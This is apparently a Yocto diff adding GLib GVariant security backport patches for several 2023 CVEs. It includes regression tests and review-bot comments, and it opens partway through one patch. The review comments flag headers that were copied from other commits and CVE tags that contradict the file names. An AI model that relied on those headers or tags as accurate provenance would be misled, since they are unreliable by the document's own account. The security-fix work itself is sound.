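+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5952,14 +5952,16 @@ g_variant_byteswap (GVariant *value)
+ g_variant_serialised_byteswap (serialised);
+
+ bytes = g_bytes_new_take (serialised.data, serialised.size);
+- new = g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE);
++ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
+ else
+ /* contains no multi-byte data */
+- new = value;
++ new = g_variant_get_normal_form (value);
+
+- return g_variant_ref_sink (new);
++ g_assert (g_variant_is_trusted (new));
++
++ return g_steal_pointer (&new);
+ }
+
+ /**
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 4ce0e4f..3dda08e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -3834,6 +3834,29 @@ test_gv_byteswap (void)
+ g_free (string);
+ }
+
++static void
++test_gv_byteswap_non_normal_non_aligned (void)
++{
++ const guint8 data[] = { 0x02 };
++ GVariant *v = NULL;
++ GVariant *v_byteswapped = NULL;
++
++ g_test_summary ("Test that calling g_variant_byteswap() on a variant which "
++ "is in non-normal form and doesn’t need byteswapping returns "
++ "the same variant in normal form.");
++
++ v = g_variant_new_from_data (G_VARIANT_TYPE_BOOLEAN, data, sizeof (data), FALSE, NULL, NULL);
++ g_assert_false (g_variant_is_normal_form (v));
++
++ v_byteswapped = g_variant_byteswap (v);
++ g_assert_true (g_variant_is_normal_form (v_byteswapped));
++
++ g_assert_cmpvariant (v, v_byteswapped);
++
++ g_variant_unref (v);
++ g_variant_unref (v_byteswapped);
++}
++
+ static void
+ test_parser (void)
+ {
+@@ -5570,6 +5593,7 @@ main (int argc, char **argv)
+ g_test_add_func ("/gvariant/builder-memory", test_builder_memory);
+ g_test_add_func ("/gvariant/hashing", test_hashing);
+ g_test_add_func ("/gvariant/byteswap", test_gv_byteswap);
++ g_test_add_func ("/gvariant/byteswap/non-normal-non-aligned", test_gv_byteswap_non_normal_non_aligned);
+ g_test_add_func ("/gvariant/parser", test_parses);
+ g_test_add_func ("/gvariant/parser/integer-bounds", test_parser_integer_bounds);
+ g_test_add_func ("/gvariant/parser/recursion", test_parser_recursion);
+--
+2.24.4
+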
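Review bot: The patch header does not match the diff it carries. The subject reads "gvariant-core: Consolidate construction of `GVariantSerialised`" and the body says "This introduces no functional changes", yet the hunks change `g_variant_byteswap()` in `glib/gvariant.c` (the no-swap branch now returns `g_variant_get_normal_form (value)` and `g_assert (g_variant_is_trusted (new));` is added) and add a new test. The file is named CVE-2023-32611-0001.patch while its tag reads `CVE: CVE-2023-32665`, and CVE-2023-32611-0002.patch carries the same tag, so anything that relies on the `CVE:` line would attribute the fix to a different CVE than the file name does. The `From` hash, subject and `Upstream-Status` URL look carried over from another upstream commit; they should be replaced with the commit these hunks actually come from, and the tag aligned with the file name (`CVE: CVE-2023-32611`) once that is confirmed against upstream.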
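--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0002.patch
@@ -0,0 +1,255 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 81 +++++++++++++++++++++++++++++++++----------
+ glib/tests/gvariant.c | 57 ++++++++++++++++++++++++++----
+ 2 files changed, 112 insertions(+), 26 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 4dbd9e8..a80c2c9 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5788,7 +5788,8 @@ g_variant_iter_loop (GVariantIter *iter,
+
+ /* Serialised data {{{1 */
+ static GVariant *
+-g_variant_deep_copy (GVariant *value)
++g_variant_deep_copy (GVariant *value,
++ gboolean byteswap)
+ {
+ switch (g_variant_classify (value))
+ {
+@@ -5806,7 +5807,7 @@ g_variant_deep_copy (GVariant *value)
+ for (i = 0, n_children = g_variant_n_children (value); i < n_children; i++)
+ {
+ GVariant *child = g_variant_get_child_value (value, i);
+- g_variant_builder_add_value (&builder, g_variant_deep_copy (child));
++ g_variant_builder_add_value (&builder, g_variant_deep_copy (child, byteswap));
+ g_variant_unref (child);
+ }
+
+@@ -5820,28 +5821,63 @@ g_variant_deep_copy (GVariant *value)
+ return g_variant_new_byte (g_variant_get_byte (value));
+
+ case G_VARIANT_CLASS_INT16:
+- return g_variant_new_int16 (g_variant_get_int16 (value));
++ if (byteswap)
++ return g_variant_new_int16 (GUINT16_SWAP_LE_BE (g_variant_get_int16 (value)));
++ else
++ return g_variant_new_int16 (g_variant_get_int16 (value));
+
+ case G_VARIANT_CLASS_UINT16:
+- return g_variant_new_uint16 (g_variant_get_uint16 (value));
++ if (byteswap)
++ return g_variant_new_uint16 (GUINT16_SWAP_LE_BE (g_variant_get_uint16 (value)));
++ else
++ return g_variant_new_uint16 (g_variant_get_uint16 (value));
+
+ case G_VARIANT_CLASS_INT32:
+- return g_variant_new_int32 (g_variant_get_int32 (value));
++ if (byteswap)
++ return g_variant_new_int32 (GUINT32_SWAP_LE_BE (g_variant_get_int32 (value)));
++ else
++ return g_variant_new_int32 (g_variant_get_int32 (value));
+
+ case G_VARIANT_CLASS_UINT32:
+- return g_variant_new_uint32 (g_variant_get_uint32 (value));
++ if (byteswap)
++ return g_variant_new_uint32 (GUINT32_SWAP_LE_BE (g_variant_get_uint32 (value)));
++ else
++ return g_variant_new_uint32 (g_variant_get_uint32 (value));
+
+ case G_VARIANT_CLASS_INT64:
+- return g_variant_new_int64 (g_variant_get_int64 (value));
++ if (byteswap)
++ return g_variant_new_int64 (GUINT64_SWAP_LE_BE (g_variant_get_int64 (value)));
++ else
++ return g_variant_new_int64 (g_variant_get_int64 (value));
+
+ case G_VARIANT_CLASS_UINT64:
+- return g_variant_new_uint64 (g_variant_get_uint64 (value));
++ if (byteswap)
++ return g_variant_new_uint64 (GUINT64_SWAP_LE_BE (g_variant_get_uint64 (value)));
++ else
++ return g_variant_new_uint64 (g_variant_get_uint64 (value));
+
+ case G_VARIANT_CLASS_HANDLE:
+- return g_variant_new_handle (g_variant_get_handle (value));
++ if (byteswap)
++ return g_variant_new_handle (GUINT32_SWAP_LE_BE (g_variant_get_handle (value)));
++ else
++ return g_variant_new_handle (g_variant_get_handle (value));
+
+ case G_VARIANT_CLASS_DOUBLE:
+- return g_variant_new_double (g_variant_get_double (value));
++ if (byteswap)
++ {
++ /* We have to convert the double to a uint64 here using a union,
++ * because a cast will round it numerically. */
++ union
++ {
++ guint64 u64;
++ gdouble dbl;
++ } u1, u2;
++ u1.dbl = g_variant_get_double (value);
++ u2.u64 = GUINT64_SWAP_LE_BE (u1.u64);
++ return g_variant_new_double (u2.dbl);
++ }
++ else
++ return g_variant_new_double (g_variant_get_double (value));
+
+ case G_VARIANT_CLASS_STRING:
+ return g_variant_new_string (g_variant_get_string (value, NULL));
+@@ -5896,7 +5932,7 @@ g_variant_get_normal_form (GVariant *value)
+ if (g_variant_is_normal_form (value))
+ return g_variant_ref (value);
+
+- trusted = g_variant_deep_copy (value);
++ trusted = g_variant_deep_copy (value, FALSE);
+ g_assert (g_variant_is_trusted (trusted));
+
+ return g_variant_ref_sink (trusted);
+@@ -5916,6 +5952,11 @@ g_variant_get_normal_form (GVariant *value)
+ * contain multi-byte numeric data. That include strings, booleans,
+ * bytes and containers containing only these things (recursively).
+ *
++ * While this function can safely handle untrusted, non-normal data, it is
++ * recommended to check whether the input is in normal form beforehand, using
++ * g_variant_is_normal_form(), and to reject non-normal inputs if your
++ * application can be strict about what inputs it rejects.
++ *
+ * The returned value is always in normal form and is marked as trusted.
+ *
+ * Returns: (transfer full): the byteswapped form of @value
+@@ -5933,21 +5974,20 @@ g_variant_byteswap (GVariant *value)
+
+ g_variant_type_info_query (type_info, &alignment, NULL);
+
+- if (alignment)
+- /* (potentially) contains multi-byte numeric data */
++ if (alignment && g_variant_is_normal_form (value))
+ {
++ /* (potentially) contains multi-byte numeric data, but is also already in
++ * normal form so we can use a faster byteswapping codepath on the
++ * serialised data */
+ GVariantSerialised serialised = { 0, };
+- GVariant *trusted;
+ GBytes *bytes;
+
+- trusted = g_variant_get_normal_form (value);
+- serialised.type_info = g_variant_get_type_info (trusted);
+- serialised.size = g_variant_get_size (trusted);
++ serialised.type_info = g_variant_get_type_info (value);
++ serialised.size = g_variant_get_size (value);
+ serialised.data = g_malloc (serialised.size);
+ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ serialised.checked_offsets_up_to = G_MAXSIZE;
+- g_variant_store (trusted, serialised.data);
+- g_variant_unref (trusted);
++ g_variant_store (value, serialised.data);
+
+ g_variant_serialised_byteswap (serialised);
+
+@@ -5955,6 +5995,9 @@ g_variant_byteswap (GVariant *value)
+ new = g_variant_ref_sink (g_variant_new_from_bytes (g_variant_get_type (value), bytes, TRUE));
+ g_bytes_unref (bytes);
+ }
++ else if (alignment)
++ /* (potentially) contains multi-byte numeric data */
++ new = g_variant_ref_sink (g_variant_deep_copy (value, TRUE));
+ else
+ /* contains no multi-byte data */
+ new = g_variant_get_normal_form (value);
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 3dda08e..679dd40 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -2284,24 +2284,67 @@ serialise_tree (TreeInstance *tree,
+ static void
+ test_byteswap (void)
+ {
+- GVariantSerialised one = { 0, }, two = { 0, };
++ GVariantSerialised one = { 0, }, two = { 0, }, three = { 0, };
+ TreeInstance *tree;
+-
++ GVariant *one_variant = NULL;
++ GVariant *two_variant = NULL;
++ GVariant *two_byteswapped = NULL;
++ GVariant *three_variant = NULL;
++ GVariant *three_byteswapped = NULL;
++ guint8 *three_data_copy = NULL;
++ gsize three_size_copy = 0;
++
++ /* Write a tree out twice, once normally and once byteswapped. */
+ tree = tree_instance_new (NULL, 3);
+ serialise_tree (tree, &one);
+
++ one_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (one.type_info)),
++ one.data, one.size, FALSE, NULL, NULL);
++
+ i_am_writing_byteswapped = TRUE;
+ serialise_tree (tree, &two);
++ serialise_tree (tree, &three);
+ i_am_writing_byteswapped = FALSE;
+
+- g_variant_serialised_byteswap (two);
+-
+- g_assert_cmpmem (one.data, one.size, two.data, two.size);
+- g_assert_cmpuint (one.depth, ==, two.depth);
+-
++ /* Swap the first byteswapped one back using the function we want to test. */
++ two_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (two.type_info)),
++ two.data, two.size, FALSE, NULL, NULL);
++ two_byteswapped = g_variant_byteswap (two_variant);
++
++ /* Make the second byteswapped one non-normal (hopefully), and then byteswap
++ * it back using the function we want to test in its non-normal mode.
++ * This might not work because it’s not necessarily possible to make an
++ * arbitrary random variant non-normal. Adding a single zero byte to the end
++ * often makes something non-normal but still readable. */
++ three_size_copy = three.size + 1;
++ three_data_copy = g_malloc (three_size_copy);
++ memcpy (three_data_copy, three.data, three.size);
++ three_data_copy[three.size] = '\0';
++
++ three_variant = g_variant_new_from_data (G_VARIANT_TYPE (g_variant_type_info_get_type_string (three.type_info)),
++ three_data_copy, three_size_copy, FALSE, NULL, NULL);
++ three_byteswapped = g_variant_byteswap (three_variant);
++
++ /* Check they’re the same. We can always compare @one_variant and
++ * @two_byteswapped. We can only compare @two_byteswapped and
++ * @three_byteswapped if @two_variant and @three_variant are equal: in that
++ * case, the corruption to @three_variant was enough to make it non-normal but
++ * not enough to change its value. */
++ g_assert_cmpvariant (one_variant, two_byteswapped);
++
++ if (g_variant_equal (two_variant, three_variant))
++ g_assert_cmpvariant (two_byteswapped, three_byteswapped);
++
++ g_variant_unref (three_byteswapped);
++ g_variant_unref (three_variant);
++ g_variant_unref (two_byteswapped);
++ g_variant_unref (two_variant);
++ g_variant_unref (one_variant);
+ tree_instance_free (tree);
+ g_free (one.data);
+ g_free (two.data);
++ g_free (three.data);
++ g_free (three_data_copy);
+ }
+
+ static void
+--
+2.24.4
+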
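Review bot: The mail header of this patch (lines 1-12) does not describe its own diff: the `From 446e69f5…` hash, the subject about factoring out framing-offset functions, the sentence "This introduces no functional changes", the `CVE: CVE-2023-32665` tag and the Upstream-Status URL are identical to the header of CVE-2023-32665-0002.patch, while the body adds a `byteswap` argument to `g_variant_deep_copy()` and reworks `g_variant_byteswap()` in glib/gvariant.c. As written, a maintainer cannot check this backport against the upstream commit it cites, and anything that reads the `CVE:` tag attributes the change to a different CVE than the file name does. The header should carry the subject, hash and URL of the upstream commit that actually made the byteswap change, and the tag should presumably read `CVE: CVE-2023-32611` to match the file name.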
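--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32636.patch
@@ -0,0 +1,49 @@
+From 21a204147b16539b3eda3143b32844c49e29f4d4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:33:49 +0000
+Subject: [PATCH] gvariant: Propagate trust when getting a child of a
+ serialised variant
+
+If a variant is trusted, that means all its children are trusted, so
+ensure that their checked offsets are set as such.
+
+This allows a lot of the offset table checks to be avoided when getting
+children from trusted serialised tuples, which speeds things up.
+
+No unit test is included because this is just a performance fix. If
+there are other slownesses, or regressions, in serialised `GVariant`
+performance, the fuzzing setup will catch them like it did this one.
+
+This change does reduce the time to run the oss-fuzz reproducer from 80s
+to about 0.7s on my machine.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2841
+oss-fuzz#54314
+
+CVE: CVE-2023-32636
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/21a204147b16539b3eda3143b32844c49e29f4d4]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 1b9d5cc..ed57c70 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1173,8 +1173,8 @@ g_variant_get_child_value (GVariant *value,
+ child->contents.serialised.bytes =
+ g_bytes_ref (value->contents.serialised.bytes);
+ child->contents.serialised.data = s_child.data;
+- child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+- child->contents.serialised.checked_offsets_up_to = s_child.checked_offsets_up_to;
++ child->contents.serialised.ordered_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.ordered_offsets_up_to;
++ child->contents.serialised.checked_offsets_up_to = (value->state & STATE_TRUSTED) ? G_MAXSIZE : s_child.checked_offsets_up_to;
+
+ return child;
+ }
+--
+2.24.4
+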
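Review bot: The patch header does not record that this change only applies on top of other patches in the series: the hunk at patch line 36 assigns `ordered_offsets_up_to` and `checked_offsets_up_to`, which its context lines treat as already existing, so they are presumably introduced by the CVE-2023-32665 patches added alongside it. A header line such as `Depends on the CVE-2023-32665 series being applied first (adds the *_offsets_up_to fields)` would keep the SRC_URI order from being changed by accident. Forcing both fields to `G_MAXSIZE` is only safe if `STATE_TRUSTED` is never set before validation; that code, and the rest of `g_variant_get_child_value()`, lie outside the hunk.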
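--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32643.patch
@@ -0,0 +1,154 @@
+From 78da5faccb3e065116b75b3ff87ff55381da6c76 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 11:24:43 +0000
+Subject: [PATCH] gvariant: Check offset table doesn't fall outside variant
+ bounds
+
+When dereferencing the first entry in the offset table for a tuple,
+check that it doesn’t fall outside the bounds of the variant first.
+
+This prevents an out-of-bounds read from some non-normal tuples.
+
+This bug was introduced in commit 73d0aa81c2575a5c9ae77d.
+
+Includes a unit test, although the test will likely only catch the
+original bug if run with asan enabled.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2840
+oss-fuzz#54302
+
+CVE: CVE-2023-32643
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/78da5faccb3e065116b75b3ff87ff55381da6c76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 12 ++++++--
+ glib/tests/gvariant.c | 63 ++++++++++++++++++++++++++++++++++++++
+ 2 files changed, 72 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 5aa2cbc..4e50ed7 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -979,7 +979,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+
+ member_info = g_variant_type_info_member_info (value.type_info, index_);
+
+- if (member_info->i + 1)
++ if (member_info->i + 1 &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_start = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 1),
+ offset_size);
+@@ -990,7 +991,8 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_start &= member_info->b;
+ member_start |= member_info->c;
+
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST &&
++ offset_size * (member_info->i + 1) <= value.size)
+ member_end = value.size - offset_size * (member_info->i + 1);
+
+ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+@@ -1001,11 +1003,15 @@ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ member_end = member_start + fixed_size;
+ }
+
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET &&
++ offset_size * (member_info->i + 2) <= value.size)
+ member_end = gvs_read_unaligned_le (value.data + value.size -
+ offset_size * (member_info->i + 2),
+ offset_size);
+
++ else /* invalid */
++ member_end = G_MAXSIZE;
++
+ if (out_member_start != NULL)
+ *out_member_start = member_start;
+ if (out_member_end != NULL)
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 679dd40..2eca8be 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5432,6 +5432,67 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that dereferencing the first element in the offset
++ * table doesn’t dereference memory before the start of the GVariant. The first
++ * element in the offset table gives the offset of the final member in the
++ * tuple (the offset table is stored in reverse), and the position of this final
++ * member is needed to check that none of the tuple members overlap with the
++ * offset table
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2840 */
++static void
++test_normal_checking_tuple_offsets5 (void)
++{
++ /* A tuple of type (sss) in normal form would have an offset table with two
++ * entries:
++ * - The first entry (lowest index in the table) gives the offset of the
++ * third `s` in the tuple, as the offset table is reversed compared to the
++ * tuple members.
++ * - The second entry (highest index in the table) gives the offset of the
++ * second `s` in the tuple.
++ * - The offset of the first `s` in the tuple is always 0.
++ *
++ * See §2.5.4 (Structures) of the GVariant specification for details, noting
++ * that the table is only layed out this way because all three members of the
++ * tuple have non-fixed sizes.
++ *
++ * It’s not clear whether the 0xaa data of this variant is part of the strings
++ * in the tuple, or part of the offset table. It doesn’t really matter. This
++ * is a regression test to check that the code to validate the offset table
++ * doesn’t unconditionally try to access the first entry in the offset table
++ * by subtracting the table size from the end of the GVariant data.
++ *
++ * In this non-normal case, that would result in an address off the start of
++ * the GVariant data, and an out-of-bounds read, because the GVariant is one
++ * byte long, but the offset table is calculated as two bytes long (with 1B
++ * sized entries) from the tuple’s type.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(sss)");
++ const guint8 data[] = { 0xaa };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2840");
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++
++ expected = g_variant_new_parsed ("('', '', '')");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an otherwise-valid serialised GVariant is considered non-normal if
+ * its offset table entries are too wide.
+ *
+@@ -5680,6 +5741,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets5",
++ test_normal_checking_tuple_offsets5);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
+ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+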
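Review bot: The new `else /* invalid */` branch in `gvs_tuple_get_member_bounds()` (patch lines 65-66) hands back `member_end = G_MAXSIZE` as a sentinel, but nothing in the hunk says what callers must do with it, and the callers are outside the hunk. I would widen the comment to `else /* invalid: offset table entry lies outside the variant; callers must reject member_end > value.size */` so the contract is stated where the sentinel is produced. The same applies to the first guard at patch lines 39-40: when the bounds test fails, `member_start` is set by an `else` that the hunk does not show. The commit message itself says the added test probably only detects the original out-of-bounds read under ASan, so a test run without a sanitizer will likely pass with or without the fix.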
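--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0001.patch
@@ -0,0 +1,103 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 49 ++++++++++++++++++++++----------------------
+ 1 file changed, 25 insertions(+), 24 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9397573..aa0e0a0 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -349,6 +349,27 @@ g_variant_ensure_size (GVariant *value)
+ }
+ }
+
++/* < private >
++ * g_variant_to_serialised:
++ * @value: a #GVariant
++ *
++ * Gets a GVariantSerialised for a GVariant in state STATE_SERIALISED.
++ */
++inline static GVariantSerialised
++g_variant_to_serialised (GVariant *value)
++{
++ g_assert (value->state & STATE_SERIALISED);
++ {
++ GVariantSerialised serialised = {
++ value->type_info,
++ (gpointer) value->contents.serialised.data,
++ value->size,
++ value->depth,
++ };
++ return serialised;
++ }
++}
++
+ /* < private >
+ * g_variant_serialise:
+ * @value: a #GVariant
+@@ -991,16 +1012,8 @@ g_variant_n_children (GVariant *value)
+ g_variant_lock (value);
+
+ if (value->state & STATE_SERIALISED)
+- {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
+-
+- n_children = g_variant_serialised_n_children (serialised);
+- }
++ n_children = g_variant_serialised_n_children (
++ g_variant_to_serialised (value));
+ else
+ n_children = value->contents.tree.n_children;
+
+@@ -1061,12 +1074,7 @@ g_variant_get_child_value (GVariant *value,
+ }
+
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth,
+- };
++ GVariantSerialised serialised = g_variant_to_serialised (value);
+ GVariantSerialised s_child;
+ GVariant *child;
+
+@@ -1179,14 +1187,7 @@ g_variant_is_normal_form (GVariant *value)
+
+ if (value->state & STATE_SERIALISED)
+ {
+- GVariantSerialised serialised = {
+- value->type_info,
+- (gpointer) value->contents.serialised.data,
+- value->size,
+- value->depth
+- };
+-
+- if (g_variant_serialised_is_normal (serialised))
++ if (g_variant_serialised_is_normal (g_variant_to_serialised (value)))
+ value->state |= STATE_TRUSTED;
+ }
+ else
+--
+2.24.4
+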
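Review bot: `g_variant_to_serialised()` (patch lines 28-47) has `g_assert (value->state & STATE_SERIALISED)` as its only guard, and its doc comment does not state that precondition as an obligation on the caller. In a build with assertions compiled out, a tree-form value passed in would have the `contents.serialised.data` union member read without any check. Two of the three call sites in this patch test the state on the line before the call; the third, in `g_variant_get_child_value()`, sits in a block whose guarding condition is outside the hunk. I would add to the comment: `@value must already be in serialised form; this is asserted, not handled, so callers must check the state first.`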
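--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0002.patch
@@ -0,0 +1,210 @@
+From 446e69f5edd72deb2196dee36bbaf8056caf6948 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:39:34 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out functions for dealing with
+ framing offsets
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/446e69f5edd72deb2196dee36bbaf8056caf6948]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 108 +++++++++++++++++++------------------
+ 1 file changed, 57 insertions(+), 51 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 83e9d85..c7c2114 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -633,30 +633,62 @@ gvs_calculate_total_size (gsize body_size,
+ return body_size + 8 * offsets;
+ }
+
++struct Offsets
++{
++ gsize data_size;
++
++ guchar *array;
++ gsize length;
++ guint offset_size;
++
++ gboolean is_normal;
++};
++
+ static gsize
+-gvs_variable_sized_array_n_children (GVariantSerialised value)
++gvs_offsets_get_offset_n (struct Offsets *offsets,
++ gsize n)
++{
++ return gvs_read_unaligned_le (
++ offsets->array + (offsets->offset_size * n), offsets->offset_size);
++}
++
++static struct Offsets
++gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ {
++ struct Offsets out = { 0, };
+ gsize offsets_array_size;
+- gsize offset_size;
+ gsize last_end;
+
+ if (value.size == 0)
+- return 0;
+-
+- offset_size = gvs_get_offset_size (value.size);
++ {
++ out.is_normal = TRUE;
++ return out;
++ }
+
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
++ out.offset_size = gvs_get_offset_size (value.size);
++ last_end = gvs_read_unaligned_le (value.data + value.size - out.offset_size,
++ out.offset_size);
+
+ if (last_end > value.size)
+- return 0;
++ return out; /* offsets not normal */
+
+ offsets_array_size = value.size - last_end;
+
+- if (offsets_array_size % offset_size)
+- return 0;
++ if (offsets_array_size % out.offset_size)
++ return out; /* offsets not normal */
++
++ out.data_size = last_end;
++ out.array = value.data + last_end;
++ out.length = offsets_array_size / out.offset_size;
++ out.is_normal = TRUE;
+
+- return offsets_array_size / offset_size;
++ return out;
++}
++
++static gsize
++gvs_variable_sized_array_n_children (GVariantSerialised value)
++{
++ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
+ static GVariantSerialised
+@@ -664,8 +696,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offset_size;
+- gsize last_end;
++
++ struct Offsets offsets = gvs_variable_sized_array_get_frame_offsets (value);
++
+ gsize start;
+ gsize end;
+
+@@ -673,18 +706,11 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
+- offset_size = gvs_get_offset_size (value.size);
+-
+- last_end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size, offset_size);
+-
+ if (index_ > 0)
+ {
+ guint alignment;
+
+- start = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * (index_ - 1)),
+- offset_size);
++ start = gvs_offsets_get_offset_n (&offsets, index_ - 1);
+
+ g_variant_type_info_query (child.type_info, &alignment, NULL);
+ start += (-start) & alignment;
+@@ -692,11 +718,9 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ else
+ start = 0;
+
+- end = gvs_read_unaligned_le (value.data + last_end +
+- (offset_size * index_),
+- offset_size);
++ end = gvs_offsets_get_offset_n (&offsets, index_);
+
+- if (start < end && end <= value.size && end <= last_end)
++ if (start < end && end <= value.size && end <= offsets.data_size)
+ {
+ child.data = value.data + start;
+ child.size = end - start;
+@@ -768,34 +792,16 @@ static gboolean
+ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ {
+ GVariantSerialised child = { 0, };
+- gsize offsets_array_size;
+- guchar *offsets_array;
+- guint offset_size;
+ guint alignment;
+- gsize last_end;
+- gsize length;
+ gsize offset;
+ gsize i;
+
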